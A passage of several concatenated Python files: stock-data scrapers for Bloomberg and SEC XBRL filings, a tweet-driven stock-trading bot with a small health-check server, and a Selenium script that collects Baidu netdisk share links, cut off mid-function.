            entry[1] = "USD_from_Mil"
        elif units == "Mil":
            entry[2] = [v + "000" if v.isdigit() else v for v in entry[2]]
            entry[1] = "was_Mil"
        result.append(entry)
    return result
################################################################################################
###################### Bloomberg Scrapers "_bb" ################################################
def bloomberg_us_stock_quote_scrape(ticker):
    """Scrape bloomberg.com's US quote page for `ticker` and push the
    embedded JSON state onto the matching Stock object ("_bb" suffix).

    The page embeds its data as ``window.__bloomberg__ = {...};`` script
    assignments; each blob is isolated, json-decoded, pruned by
    replace_bloomberg_values_list(), and saved via
    convert_bloomberg_dict_to_stock_object_data().
    """
    url = "https://www.bloomberg.com/quote/{ticker}:US".format(ticker=ticker)
    response = requests.get(url, headers=config.HEADERS)
    page = response.text
    #logging.warning(page)
    soup = BeautifulSoup(page, "html.parser")
    # every inline <script> is a candidate; only those assigning to
    # window.__bloomberg__ carry quote data
    data_units = soup.find_all("script")
    output_list = []
    for unit in data_units:
        if "window.__bloomberg__" in unit.text:
            unit_text = str(unit)
            str_list = unit_text.split("window.__bloomberg__")
            for str_unit in str_list:
                # keep only the right-hand side of the "= {...}" assignment
                dict_str = str_unit.split(" = ", 1)[-1]
                value = dict_str.strip()
                # trim the closing </script> tag and trailing semicolon
                if value.endswith("</script>"):
                    value = value.rsplit("</script>", 1)[0]
                    value = value.strip()
                if not value:
                    continue
                #print(value[-1])
                if value.endswith(";"):
                    value = value[:-1]
                    #print("\t", value[-1])
                if value and value.startswith("{") and value.endswith("}"):
                    value = json.loads(value)
                    output_list.append(value)
                else:
                    #logging.warning(value)
                    continue
    data = replace_bloomberg_values_list(output_list)
    logging.warning("")
    pp.pprint(data)
    if len(data) == 1:
        data = data[0]
    else:
        logging.warning('len = {}'.format(len(data)))
    # NOTE(review): when len(data) != 1 a *list* is passed downstream, and
    # convert_bloomberg_dict_to_stock_object_data calls .get() on it --
    # likely an unhandled case; confirm against live page output.
    bloomberg_dict = data
    convert_bloomberg_dict_to_stock_object_data(ticker, bloomberg_dict)
    # pp.pprint(data)
    # with open('output{}.txt'.format(ticker), 'wt') as out:
    #     pp.pprint(data, stream=out)
def replace_bloomberg_values_dict(input_dict, original_list):
    """Recursively prune a Bloomberg JSON dict.

    Boilerplate keys are dropped, nested containers are cleaned via the
    matching helpers, "$"-reference strings are resolved against
    original_list, and empty / "None" / "$"-keyed leaves are discarded.
    Returns the cleaned dict, or None when nothing survives.
    """
    ignored_keys = ("adCode", "api", "balance", "cash", "income", "dataStrip", "news", "sectors", "time")
    cleaned = {}
    for key, raw in input_dict.items():
        if key in ignored_keys:
            continue
        replacement = None
        raw_type = type(raw)
        if raw_type is dict:
            replacement = replace_bloomberg_values_dict(raw, original_list)
        elif raw_type is list:
            replacement = replace_bloomberg_values_list(raw, original_list)
        elif raw_type in (str, int, float, bool):
            if raw_type is str:
                if raw.startswith("$"):
                    replacement = replace_bloomberg_dollarsign_keys_with_values(raw, original_list)
            elif raw:
                logging.warning(raw_type)
        if replacement:
            cleaned[key] = replacement
        elif raw and raw != "None":
            if not key.startswith("$"):
                cleaned[key] = raw
    if cleaned:
        return cleaned
def replace_bloomberg_values_list(input_list, original_list=None):
    """Recursively prune a Bloomberg JSON list.

    Nested dicts/lists are cleaned by the matching helpers and kept only
    when non-empty; scalar entries are kept unless falsy or the literal
    string "None". On the top-level call, the list itself doubles as the
    "$"-reference lookup source.
    """
    if original_list is None:
        original_list = input_list
    cleaned = []
    for entry in input_list:
        entry_type = type(entry)
        if entry_type is dict:
            nested = replace_bloomberg_values_dict(entry, original_list)
            if nested:
                cleaned.append(nested)
        elif entry_type is list:
            nested = replace_bloomberg_values_list(entry, original_list)
            if nested:
                cleaned.append(nested)
        elif entry_type in (str, int, float, bool):
            if entry and entry != "None":
                cleaned.append(entry)
        elif entry:
            logging.warning(entry_type)
    return cleaned
def replace_bloomberg_dollarsign_keys_with_values(ref_str, original_list):
    """Resolve a "$..."-style reference string.

    Scans the dicts in original_list for keys beginning with "$" and
    returns the value stored under ref_str in the first dict that carries
    it; returns None implicitly when no dict matches.
    """
    for candidate in original_list:
        dollar_keys = [key for key in candidate.keys() if key.startswith("$")]
        if dollar_keys and ref_str in dollar_keys:
            return candidate[ref_str]
def convert_bloomberg_dict_to_stock_object_data(ticker, bloomberg_dict):
    """Copy the parsed Bloomberg payload onto the Stock object.

    Saves each "keyStats" entry (by its "id") and every scalar field of
    the "quote" sub-dict via db.set_Stock_attribute with the "_bb" suffix.
    """
    stock = utils.return_stock_by_symbol(ticker)
    # key stats section
    key_stats = bloomberg_dict.get("keyStats")
    stats_entries = None
    if key_stats:
        stats_entries = key_stats.get("keyStatsList")
    if stats_entries:
        for entry in stats_entries:
            entry_id = entry.get("id")
            entry_value = entry.get("fieldValue")
            if entry_id:
                db.set_Stock_attribute(stock, str(entry_id), entry_value, "_bb")
    # quote section
    quote = bloomberg_dict.get("quote")
    if quote and type(quote) is dict:
        for attr_name, attr_value in quote.items():
            if type(attr_value) in [list, dict, set]:
                # lots of unhelpful large amounts of data
                continue
            db.set_Stock_attribute(stock, str(attr_name), attr_value, "_bb")
################################################################################################
###EDGAR Scrapers: 10-k:"_tk","10-Q":"_tq","8-K":"_ek","20-F":"_tf","13-D":"_td","144":"_of" ###
def return_xbrl_tree_and_namespace(path_to_zipfile=None):
    """Open an SEC XBRL zip archive and parse its main XML document.

    The "main" document is taken to be the last ``*.xml`` member whose name
    contains no underscore (the schema/label/presentation companions all do).

    Parameters
    ----------
    path_to_zipfile : str
        Path to the downloaded XBRL ``.zip`` file.

    Returns
    -------
    list
        ``[ElementTree, namespace_dict, main_file_name]`` on success, or
        ``[None, None, None]`` when the archive or XML cannot be read.
    """
    try:
        archive = zf.ZipFile(path_to_zipfile, 'r')
    except Exception as e:
        logging.error(e)
        return [None, None, None]
    try:  # bug fix: the archive handle previously leaked (never closed)
        main_file_name = None
        for name in archive.namelist():
            if name.endswith(".xml") and "_" not in name:
                main_file_name = name
        # collect the xmlns prefixes declared in the document
        ns = {}
        try:
            for event, (name, value) in ET.iterparse(archive.open(main_file_name), ['start-ns']):
                if name:
                    ns[name] = value
        except Exception as e:
            logging.error(e)
            return [None, None, None]
        tree = ET.parse(archive.open(main_file_name))
    finally:
        archive.close()
    return [tree, ns, main_file_name]
def return_formatted_xbrl_attribute_ref(ticker, accounting_item, institution, xbrl_dict=None, period=None):
    """Build the attribute name used to store an XBRL accounting item.

    The institution is normalized ("us-gaap" -> "gaap"; the company's own
    ticker -> "corp"), then the item and institution are joined. A period
    other than the literal "period" appends "_most_recent_<period>";
    xbrl_dict=True appends "__dict" instead. Hyphens become underscores.
    """
    if institution not in ("us-gaap", "dei"):
        if institution.lower() == ticker.lower():
            institution = "corp"
        else:
            logging.info(institution)
    if institution == "us-gaap":
        institution = "gaap"
    base = "{}_{}".format(accounting_item, institution)
    if period:
        ref = base if period == "period" else base + "_most_recent_" + period
    elif xbrl_dict:
        ref = base + "__dict"
    else:
        ref = base
    return ref.replace("-", "_")
def return_document_type_suffix(base_dict):
    """Map a filing's dei DocumentType to the wxStocks attribute suffix.

    Reads the first DocumentType entry from base_dict["dei"], strips the
    "/A" (amended) and trailing "T" (transitional) markers, and returns
    the matching suffix ("_tk", "_tq", "_ek", "_tf", "_td", "_of"),
    prefixed with "__a"/"__t" when amended/transitional. Returns None for
    ignored or unrecognized document types (unrecognized ones are recorded
    in config.UNLISTED_XBRL_DOCUMENT_TYPE_LIST).
    """
    document_type = None
    try:
        type_dict = base_dict.get("dei").get("DocumentType")
        first_key = list(type_dict.keys())[0]
        document_type = type_dict.get(first_key).get("value")
        logging.info(document_type)
    except Exception as e:
        logging.error(e)
    if document_type in config.IGNORED_XBRL_DOCUMENT_TYPE_LIST:
        return
    amended_report = False
    transitional_report = False
    if document_type:
        if "/A" in document_type:
            amended_report = True
            document_type = document_type.replace("/A", "")
        if document_type[-1:] == "T":
            transitional_report = True
            document_type = document_type[:-1]
    suffix_by_type = {
        "10-K": "_tk",
        "10-Q": "_tq",
        "8-K": "_ek",
        "20-F": "_tf",
        "13-D": "_td",
        "144": "_of",
    }
    if document_type in config.DESIRED_XBRL_DOCUMENT_TYPE_LIST:
        suffix = suffix_by_type.get(document_type)
        if suffix is None:
            raise Exception("No document_type '{}' in xbrl file".format(document_type))
    else:
        if document_type:
            logging.error(document_type)
            if document_type not in config.IGNORED_XBRL_DOCUMENT_TYPE_LIST:
                config.UNLISTED_XBRL_DOCUMENT_TYPE_LIST.append(document_type)
                logging.warning(config.UNLISTED_XBRL_DOCUMENT_TYPE_LIST)
        return
    if transitional_report:
        suffix = "__t" + suffix
    if amended_report:
        suffix = "__a" + suffix
    return suffix
def return_simple_xbrl_dict(xbrl_tree, namespace, file_name):
    """Flatten a parsed XBRL filing into a nested dict keyed by ticker:

        {ticker: {institution: {accounting_item: {period: {"value": ...,
                                                           "datetime": ...}}}}}

    xbrl_tree/namespace come from return_xbrl_tree_and_namespace();
    file_name is used for logging only. Returns None when no CIK can be
    extracted from the filing or no stock in the database matches it.
    """
    tree = xbrl_tree
    root = tree.getroot()
    ns = namespace
    # invert prefix->uri so fact-tag URIs can be mapped back to prefixes
    reverse_ns = {v: k for k, v in ns.items()}
    # get CIK for stock, else return empty dict
    try:
        context_tag = tree.find(config.DEFAULT_CONTEXT_TAG, ns)
        entity_tag = context_tag.find(config.DEFAULT_ENTITY_TAG, ns)
        identifier_tag = entity_tag.find(config.DEFAULT_IDENTIFIER_TAG, ns)
        cik = identifier_tag.text
    except:
        logging.error('CIK could not be found for: {}'.format(file_name))
        return None
    stock = utils.return_stock_by_cik(cik)
    if not stock:
        logging.info('No stock for CIK: {}'.format(cik))
        return None
    # Stock with CIK found, time to save stuff
    ticker = stock.ticker
    # try the configured context tag first, then common fallbacks
    context_element_list = None
    for identifier_tag in [config.DEFAULT_IDENTIFIER_TAG,
                            "xbrli:context",
                            "context",
                            ]:
        try:
            context_element_list = tree.findall(identifier_tag, ns)
        except:
            pass
        if context_element_list:
            break
    if not context_element_list:
        # last resort: scan the root's children for anything tagged "context"
        logging.info("Improperly formatted XBRL file. Will try to parse with common made errors...")
        potential_identifier_tag_list = []
        root = tree.getroot()
        logging.warning(root.tag)
        logging.warning(root.attrib)
        for child in root:
            if 'context' in child.tag:
                if child.tag not in potential_identifier_tag_list:
                    potential_identifier_tag_list.append(child.tag)
        for identifier_tag in potential_identifier_tag_list:
            context_element_list = tree.findall(identifier_tag)
        if not context_element_list:
            logging.error(context_element_list)
            logging.error(ns)
            logging.error("{} XBRL file could not be parsed...".format(ticker))
            sys.exit()
            # NOTE(review): unreachable -- sys.exit() raises before this line
            return
    xbrl_stock_dict = {ticker: {}}
    for element in context_element_list:
        period_dict = dict()
        dimension = None
        dimension_value = None
        previous_entry = None
        # get period first:
        period_element = element.find(config.DEFAULT_PERIOD_TAG)
        for item in period_element.iter():
            # a lot of these datetimes have leading and trailing \n's
            formatted_item = str(item.text).strip().replace("\n", "")
            if "T" in formatted_item: # someone put time in the date str
                formatted_item = formatted_item.split("T")[0]
            if "startDate" in item.tag:
                period_dict["startDate"] = formatted_item
            elif "endDate" in item.tag:
                period_dict["endDate"] = formatted_item
            elif "instant" in item.tag:
                period_dict["instant"] = formatted_item
            elif "forever" in item.tag:
                period_dict["forever"] = formatted_item
        if not period_dict:
            logging.error("No period")
        else:
            # logging.warning(period_dict)
            pass
        # datetime YYYY-MM-DD
        # serialize the period: "end:start" for ranges, a single date otherwise
        datetime_delta = None
        if period_dict.get("startDate"):
            start_date = period_dict.get("startDate")
            end_date = period_dict.get("endDate")
            if start_date != end_date:
                period_serialized = end_date + ":" + start_date
            else:
                period_serialized = end_date
            start_datetime = utils.iso_date_to_datetime(start_date)
            end_datetime = utils.iso_date_to_datetime(end_date)
            datetime_delta = end_datetime - start_datetime
            datetime_to_save = end_datetime
            iso_date_to_save = end_date
            iso_start_date = start_date
        elif period_dict.get("instant"):
            instant = period_dict.get("instant")
            period_serialized = instant
            instant_datetime = utils.iso_date_to_datetime(instant)
            datetime_to_save = instant_datetime
            iso_date_to_save = instant
        elif period_dict.get("forever"):
            forever = period_dict.get("forever")
            period_serialized = forever
            forever_datetime = utils.iso_date_to_datetime(forever)
            datetime_to_save = forever_datetime
            iso_date_to_save = forever
        else:
            # NOTE(review): in this branch iso_date_to_save is left unbound
            # (or stale from a prior iteration); the "datetime" update below
            # would then fail or record the wrong date -- confirm filings
            # always carry a period element.
            logging.error("no period_serialized")
            period_serialized = None
            datetime_to_save = None
        # collect every fact element that references this context
        context_id = element.get("id")
        context_ref_list = [x for x in root if x.get("contextRef") == context_id]
        for context_element in context_ref_list:
            # these text attributes are a mess, so i ignore them
            if "TextBlock" in str(context_element.tag):
                continue
            elif "<" in str(context_element.text):
                continue
            elif "<div " in str(context_element.text) and "</div>" in str(context_element.text):
                continue
            # split "{uri}LocalName" into institution prefix + item name
            tag = context_element.tag
            split_tag = tag.split("}")
            if len(split_tag) > 2:
                logging.error(split_tag)
            institution = reverse_ns.get(split_tag[0][1:])
            accounting_item = split_tag[1]
            # lots of problems with new lines in this
            value = str(context_element.text).strip().replace("\n","")
            unitRef = context_element.get("unitRef")
            decimals = context_element.get("decimals")
            # insert the value under ticker/institution/item/period
            if not xbrl_stock_dict[ticker].get(institution):
                xbrl_stock_dict[ticker][institution] = {accounting_item: {period_serialized: {"value": value}}}
            elif xbrl_stock_dict[ticker][institution].get(accounting_item) is None:
                xbrl_stock_dict[ticker][institution][accounting_item] = {period_serialized: {"value": value}}
            else:
                xbrl_stock_dict[ticker][institution][accounting_item].update({period_serialized: {"value": value}})
            period_dict = xbrl_stock_dict[ticker][institution][accounting_item][period_serialized]
            period_dict.update({"datetime": iso_date_to_save})
            if datetime_delta:
                period_dict.update({"timedeltastart": iso_start_date})
            if unitRef:
                period_dict.update({"unitRef": unitRef})
            if decimals:
                period_dict.update({"decimals": decimals})
    return(xbrl_stock_dict)
def save_stock_dict(xbrl_stock_dict, file_name):
    """Persist a parsed XBRL dict (from return_simple_xbrl_dict) onto the
    matching Stock object inside a single database transaction.

    For every institution/accounting item, the new period dict is merged
    with any previously stored one, a "most_recent" index is (re)built,
    and the newest value per time range (year/quarter/month/other) is also
    exposed as a flat attribute via db.set_Stock_attribute().

    Parameters
    ----------
    xbrl_stock_dict : dict
        {ticker: {institution: {accounting_item: {period: {...}}}}}
    file_name : str
        Source file name, used for logging only.
    """
    with db.db.transaction() as connection:
        logging.info("Saving data from: {}".format(file_name))
        if not xbrl_stock_dict:
            logging.error("No xbrl_stock_dict")
            return
        ticker = list(xbrl_stock_dict.keys())[0]  # dict is keyed by a single ticker
        stock = utils.return_stock_by_symbol(ticker)
        if not stock:
            logging.info("No stock listed for {}".format(ticker))
            return
        base_dict = xbrl_stock_dict[ticker]
        today = datetime.date.today()
        suffix = return_document_type_suffix(base_dict)
        if not suffix:
            return
        for institution in list(base_dict.keys()):
            institution_dict = base_dict[institution]
            for accounting_item in list(institution_dict.keys()):
                period_dict = institution_dict[accounting_item]
                if not type(period_dict) is dict:
                    # stored dicts may round-trip as their repr strings
                    period_dict = ast.literal_eval(period_dict)
                period_dict_str = return_formatted_xbrl_attribute_ref(ticker, accounting_item, institution, xbrl_dict=True)
                period_dict_str_without_suffix = period_dict_str
                period_dict_str = period_dict_str + suffix
                try:
                    stock_accounting_item_dict = getattr(stock, period_dict_str)
                except Exception:
                    stock_accounting_item_dict = None
                if stock_accounting_item_dict:
                    if not type(stock_accounting_item_dict) is dict:
                        stock_accounting_item_dict = ast.literal_eval(stock_accounting_item_dict)
                # merge the new periods into any previously stored dict
                if stock_accounting_item_dict:
                    stock_accounting_item_dict.update(period_dict)
                    db.set_Stock_attribute(stock, period_dict_str_without_suffix, stock_accounting_item_dict, suffix)
                else:
                    db.set_Stock_attribute(stock, period_dict_str_without_suffix, period_dict, suffix)
                    stock_accounting_item_dict = period_dict
                stock_period_dict = getattr(stock, period_dict_str)
                if not type(stock_period_dict) is dict:
                    stock_period_dict = ast.literal_eval(stock_period_dict)
                    if not type(stock_period_dict) is dict:
                        logging.warning("failure")
                        pp.pprint(stock_period_dict)
                        sys.exit()
                # classify every stored period: [serialized key, end dt, start dt, range]
                datetime_fourple_list = []
                for period in list(stock_period_dict.keys()):
                    if period == "most_recent":
                        continue
                    period_datetime_str = stock_period_dict[period].get("datetime")
                    period_datetime = utils.iso_date_to_datetime(period_datetime_str)
                    timedelta_start = stock_period_dict[period].get("timedeltastart")
                    serialize_index_to_save = period_datetime_str
                    if timedelta_start:
                        serialize_index_to_save = str(period_datetime_str) + ":" + str(timedelta_start)
                        period_endtime_datetime = utils.iso_date_to_datetime(timedelta_start)
                        datetime_delta = period_datetime - period_endtime_datetime
                        # bucket the duration into a named reporting range
                        if datetime_delta >= datetime.timedelta(days=359) and datetime_delta < datetime.timedelta(days=370):
                            timedelta_range = "year"
                        elif datetime_delta > datetime.timedelta(days=85) and datetime_delta < datetime.timedelta(days=95):
                            timedelta_range = "quarter"
                        elif datetime_delta >= datetime.timedelta(days=27) and datetime_delta <= datetime.timedelta(days=32):
                            timedelta_range = "month"
                        else:
                            timedelta_range = "other"
                    else:
                        # instantaneous periods carry no range
                        timedelta_range = None
                        period_endtime_datetime = None
                    datetime_fourple_list.append([serialize_index_to_save, period_datetime, period_endtime_datetime, timedelta_range])
                set_of_ranges = set([fourple[3] for fourple in datetime_fourple_list])
                # pick the newest period overall
                youngest_datetime = max(fourple[1] for fourple in datetime_fourple_list if fourple[1])
                youngest_fourple_list = [fourple for fourple in datetime_fourple_list if fourple[1] == youngest_datetime]
                if len(youngest_fourple_list) > 1:
                    # tie-break on the latest start date when several periods
                    # end at the same instant
                    relevant_list = [fourple for fourple in datetime_fourple_list if fourple[2]]
                    try:
                        youngest_start_datetime = max(fourple[2] for fourple in relevant_list if fourple[2])
                        youngest_start_dt_fourple = [fourple for fourple in relevant_list if fourple[2] == youngest_start_datetime]
                        youngest = youngest_start_dt_fourple[0]
                    except Exception:
                        logging.warning("Accounting item has multiple simultanious, instantanious entries, choosing the first")
                        youngest = youngest_fourple_list[0]
                else:
                    youngest = youngest_fourple_list[0]
                can_be_updated = stock_period_dict.get("most_recent")
                if can_be_updated:
                    # Bug fix: this previously wrote {time_range: youngest[0]},
                    # but time_range is not defined until the loop below --
                    # a NameError (or a stale leaked value). Mirror the
                    # else-branch and use the "period" key.
                    can_be_updated.update({"period": youngest[0]})
                else:
                    stock_period_dict.update({"most_recent": {"period": youngest[0]}})
                if len(list(set_of_ranges)) > 1:
                    # additionally index the newest period per time range
                    for time_range in set_of_ranges:
                        time_range_list = [fourple for fourple in datetime_fourple_list if fourple[3] == time_range]
                        try:
                            youngest_datetime = max(fourple[1] for fourple in time_range_list)
                        except Exception:
                            logging.warning(datetime_fourple_list)
                            logging.warning(accounting_item)
                            sys.exit()
                        youngest_datetime_delta = today - youngest_datetime
                        if youngest_datetime_delta.days > 366:
                            logging.warning("very old data, over a year old, use most recent period instead")
                            continue
                        youngest_fourple_list = [fourple for fourple in time_range_list if fourple[1] == youngest_datetime]
                        youngest = youngest_fourple_list[0]
                        can_be_updated = stock_period_dict.get("most_recent")
                        if can_be_updated:
                            can_be_updated.update({time_range: youngest[0]})
                        else:
                            stock_period_dict.update({"most_recent": {time_range: youngest[0]}})
                # finally expose each most-recent value as a flat attribute
                most_recent_dict = stock_period_dict.get("most_recent")
                for time_range in list(most_recent_dict.keys()):
                    period_index = stock_period_dict["most_recent"][time_range]
                    value = stock_period_dict[period_index]["value"]
                    if len(list(most_recent_dict.keys())) > 1:
                        db.set_Stock_attribute(stock, return_formatted_xbrl_attribute_ref(ticker, accounting_item, institution, period=time_range), value, suffix)
                    else:
                        db.set_Stock_attribute(stock, return_formatted_xbrl_attribute_ref(ticker, accounting_item, institution), value, suffix)
        db.pack_if_necessary()
def scrape_xbrl_from_file(path_to_zipfile):
    """Parse one XBRL zip file and persist its stock data to the database.

    Silently returns if the file cannot be parsed or yields no data.
    """
    tree, ns, file_name = return_xbrl_tree_and_namespace(path_to_zipfile=path_to_zipfile)
    # All three come back as None when the archive could not be parsed.
    if tree is None and ns is None and file_name is None:
        return
    stock_dict = return_simple_xbrl_dict(tree, ns, file_name)
    if not stock_dict:
        return
    # Remember that this file has been imported.
    config.SET_OF_FILENAMES_OF_IMPORTED_FILES.add(path_to_zipfile)
    save_stock_dict(stock_dict, file_name)
    logging.info("Success!")
    db.save_filenames_imported_files()
def sec_xbrl_download_launcher(year=None, month=None, from_year=None, to_year=None, add_to_wxStocks_database=None, use_wxStocks_cik_list=True):
    """Run sec_xbrl_download on a background thread so the caller does not block."""
    download_kwargs = {
        "year": year,
        "month": month,
        "from_year": from_year,
        "to_year": to_year,
        "add_to_wxStocks_database": add_to_wxStocks_database,
        "use_wxStocks_cik_list": use_wxStocks_cik_list,
    }
    threading.Thread(target=sec_xbrl_download, kwargs=download_kwargs).start()
def sec_xbrl_download(year=None, month=None, from_year=None, to_year=None, add_to_wxStocks_database=None, use_wxStocks_cik_list=True):
    """Download SEC XBRL filings via loadSECfilings.

    Mirrors the CLI: loadSECfilings.py -y <year> -m <month> | -f <from_year> -t <to_year>

    Either (year, month) or (from_year, to_year) must be supplied.
    Returns "error" on invalid input, otherwise None.
    """
    if not ((year and month) or (from_year and to_year)):
        logging.error("improper inputs")
        return "error"
    if from_year and to_year:
        # Fix: convert to int BEFORE comparing. The original compared the raw
        # arguments, so string years compared lexicographically ("9" > "10"),
        # and only validated convertibility afterwards with a bare except.
        try:
            from_year = int(from_year)
            to_year = int(to_year)
        except (TypeError, ValueError):
            logging.error("improper inputs")
            return "error"
        if from_year > to_year:
            logging.error("improper inputs")
            return "error"
    current_cik_list = None
    if use_wxStocks_cik_list:
        # Collect the distinct, non-empty CIK numbers of all known stocks.
        config.GLOBAL_STOCK_DICT = db.root.Stock
        current_cik_list = list(set([getattr(stock, "cik") for stock in config.GLOBAL_STOCK_DICT.values() if hasattr(stock, "cik")]))
        current_cik_list = [int(cik) for cik in current_cik_list if cik]
    if year and month:
        loadSECfilings.main(['-y', str(year), '-m', str(month)], add_to_wxStocks_database=add_to_wxStocks_database, wxStocks_cik_list=current_cik_list)
    elif from_year and to_year:
        now = datetime.datetime.now()
        this_month = int(now.month)
        this_year = int(now.year)
        # Not using loadSECfilings.main(['-f', ..., '-t', ...]) because it
        # iterates month-by-month internally anyway; looping here lets us
        # pack the database after each month.
        for year in range(from_year, to_year + 1):
            # Don't request future months of the current year.
            last_month = this_month if year == this_year else 12
            for month in reversed(range(1, last_month + 1)):
                loadSECfilings.main(['-y', str(year), '-m', str(month)], add_to_wxStocks_database=add_to_wxStocks_database, wxStocks_cik_list=current_cik_list)
                logging.info("pack data after each month...")
                db.pack_db()
    db.pack_db()
    logging.info("All done!")
################################################################################################
################################################################################################
################################################################################################
################################################################################################
################################################################################################
#end of line |
main.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from datetime import datetime
from time import sleep
from analysis import Analysis
from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer
from logs import Logs
from threading import Event
from threading import Thread
from trading import Trading
from twitter import Twitter
# Whether to send all logs to the cloud instead of a local file.
LOGS_TO_CLOUD = True

# The duration of the smallest backoff step in seconds.
BACKOFF_STEP_S = 0.1

# The maximum number of retry steps, equivalent to 0.1 * (2^12 - 1) = 409.5
# seconds of total delay. This is the largest interval that one backoff
# sequence may take.
MAX_TRIES = 12

# The time in seconds after which to reset a backoff sequence. This is the
# smallest interval at which backoff sequences may repeat normally.
BACKOFF_RESET_S = 30 * 60

# The host for the monitor Web server. 0.0.0.0 binds every interface.
MONITOR_HOST = "0.0.0.0"

# The port for the monitor Web server.
MONITOR_PORT = 80
class Monitor:
    """A monitor exposing a Web server while the main loop is running.

    NOTE(review): this module imports BaseHTTPServer, i.e. Python 2; on
    Python 3 wfile.write would need bytes, not str — confirm target runtime.
    """

    def __init__(self):
        """Creates a Web server on a background thread."""
        self.server = HTTPServer((MONITOR_HOST, MONITOR_PORT),
                                 self.MonitorHandler)
        self.thread = Thread(target=self.server.serve_forever)
        # Daemonize so the server thread never blocks interpreter exit.
        self.thread.daemon = True

    def start(self):
        """Starts the Web server background thread."""
        self.thread.start()

    def stop(self):
        """Stops the Web server and background thread."""
        self.server.shutdown()
        self.server.server_close()

    class MonitorHandler(BaseHTTPRequestHandler):
        """An HTTP request handler that responds with "OK" while running."""

        def _set_headers(self):
            # Plain-text 200 response, suitable for simple health checks.
            self.send_response(200)
            self.send_header("Content-type", "text/plain")
            self.end_headers()

        def do_GET(self):
            self._set_headers()
            self.wfile.write("OK")

        def do_HEAD(self):
            self._set_headers()
class Main:
    """A wrapper for the main application logic and retry loop."""

    def __init__(self):
        self.logs = Logs(name="main", to_cloud=LOGS_TO_CLOUD)
        self.twitter = Twitter(logs_to_cloud=LOGS_TO_CLOUD)

    def twitter_callback(self, tweet):
        """Analyzes Trump tweets, trades stocks, and tweets about it."""

        # Initialize the Analysis, Logs, Trading, and Twitter instances inside
        # the callback to create separate httplib2 instances per thread.
        analysis = Analysis(logs_to_cloud=LOGS_TO_CLOUD)
        logs = Logs(name="main-callback", to_cloud=LOGS_TO_CLOUD)

        # Analyze the tweet.
        companies = analysis.find_companies(tweet)
        logs.info("Using companies: %s" % companies)
        if not companies:
            return

        # Trade stocks.
        trading = Trading(logs_to_cloud=LOGS_TO_CLOUD)
        trading.make_trades(companies)

        # Tweet about it.
        twitter = Twitter(logs_to_cloud=LOGS_TO_CLOUD)
        twitter.tweet(companies, tweet)

    def run_session(self):
        """Runs a single streaming session. Logs and cleans up after
        exceptions.
        """
        self.logs.info("Starting new session.")
        try:
            self.twitter.start_streaming(self.twitter_callback)
        except:
            # Deliberate catch-all: any streaming failure is logged here and
            # the retry loop in run() decides whether to start a new session.
            self.logs.catch()
        finally:
            self.twitter.stop_streaming()
            self.logs.info("Ending session.")

    def backoff(self, tries):
        """Sleeps an exponential number of seconds based on the number of
        tries.
        """
        delay = BACKOFF_STEP_S * pow(2, tries)
        self.logs.warn("Waiting for %.1f seconds." % delay)
        sleep(delay)

    def run(self):
        """Runs the main retry loop with exponential backoff."""

        tries = 0
        while True:

            # The session blocks until an error occurs.
            self.run_session()

            # Remember the first time a backoff sequence starts.
            # (backoff_start is always bound before use: tries starts at 0.)
            now = datetime.now()
            if tries == 0:
                self.logs.debug("Starting first backoff sequence.")
                backoff_start = now

            # Reset the backoff sequence if the last error was long ago.
            if (now - backoff_start).total_seconds() > BACKOFF_RESET_S:
                self.logs.debug("Starting new backoff sequence.")
                tries = 0
                backoff_start = now

            # Give up after the maximum number of tries.
            if tries >= MAX_TRIES:
                self.logs.warn("Exceeded maximum retry count.")
                break

            # Wait according to the progression of the backoff sequence.
            self.backoff(tries)

            # Increment the number of tries for the next error.
            tries += 1
if __name__ == "__main__":
    # Start the health-check server, then run the retry loop until it gives up.
    monitor = Monitor()
    monitor.start()
    try:
        Main().run()
    finally:
        # Always shut the monitor server down, even if run() raises.
        monitor.stop()
|
download.py |
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException, TimeoutException
import time
import json
import re
# import sys
# sys.path.append('/remote-home/my/Projects/pycloud')
from pycloud.netdisk import NetDisk
from multiprocessing import Process, Queue
# Work queue of (url, path) pairs shared with the worker processes.
book_lists_queue = Queue()
with open('demo/d4j/book_lists.json', 'r') as f:
    book_lists = json.load(f)
for book_list in book_lists:
    book_lists_queue.put(book_list)
# Share URLs already saved, used to skip duplicates.
# NOTE(review): this is a plain set, not a multiprocessing-shared structure —
# each forked worker gets its own copy, so deduplication is per-process only;
# confirm that is acceptable.
share_url_pool = set()
def save_d4j(queue, url_pool):
    """Worker: drain *queue* of (url, path) listing pages, scrape Baidu
    netdisk share links plus their extraction codes, and save each new share.

    queue    -- Queue of (listing_url, save_subpath) pairs
    url_pool -- set of share URLs already saved, used to skip duplicates
    """
    nd = NetDisk()
    nd.login_with_cookie()
    while True:
        if queue.empty():
            return
        url, path = queue.get()
        try:
            try:
                nd.driver.get(url)
                WebDriverWait(driver=nd.driver, timeout=60, poll_frequency=0.5).until(
                    expected_conditions.presence_of_element_located((By.XPATH, "//div")))
            except TimeoutException:
                continue
            time.sleep(2)
            # Collect the article links on the listing page.
            hrefs = [element.get_attribute('href') for element in nd.driver.find_elements_by_xpath(
                "//article//h2[@class='kratos-entry-title-new']//a")]
            for href in hrefs:
                try:
                    nd.driver.get(href)
                    WebDriverWait(driver=nd.driver, timeout=60, poll_frequency=0.5).until(
                        expected_conditions.presence_of_element_located((By.XPATH, "//div")))
                except TimeoutException:
                    continue
                time.sleep(2)
                try:
                    extra_link = nd.driver.find_element_by_class_name('downbtn').get_attribute('href')
                except NoSuchElementException:
                    continue
                share_url, vc = None, None
                if extra_link.startswith('https://pan.baidu.com'):
                    # Direct share link; the extraction code is in the page text.
                    share_url = extra_link
                    try:
                        vc = re.findall(r'提取码[::]\s+([a-zA-Z0-9]{4})', nd.driver.page_source)[0]
                    except Exception as e:
                        print(e)
                else:
                    # Indirect download page; follow it and scrape code + link.
                    try:
                        nd.driver.get(extra_link)
                        WebDriverWait(driver=nd.driver, timeout=60, poll_frequency=0.5).until(
                            expected_conditions.presence_of_element_located((By.XPATH, "//div")))
                    except TimeoutException:
                        continue
                    for element in nd.driver.find_elements_by_xpath("//div[@class='plus_l']//li"):
                        if '百度网盘提取码 :' in element.text:
                            vc = element.text.replace('百度网盘提取码 :', '').strip()
                    share_url = nd.driver.find_element_by_xpath("//div[@class='panel-body']/span/a").get_attribute('href')
                if share_url and vc and share_url not in url_pool:
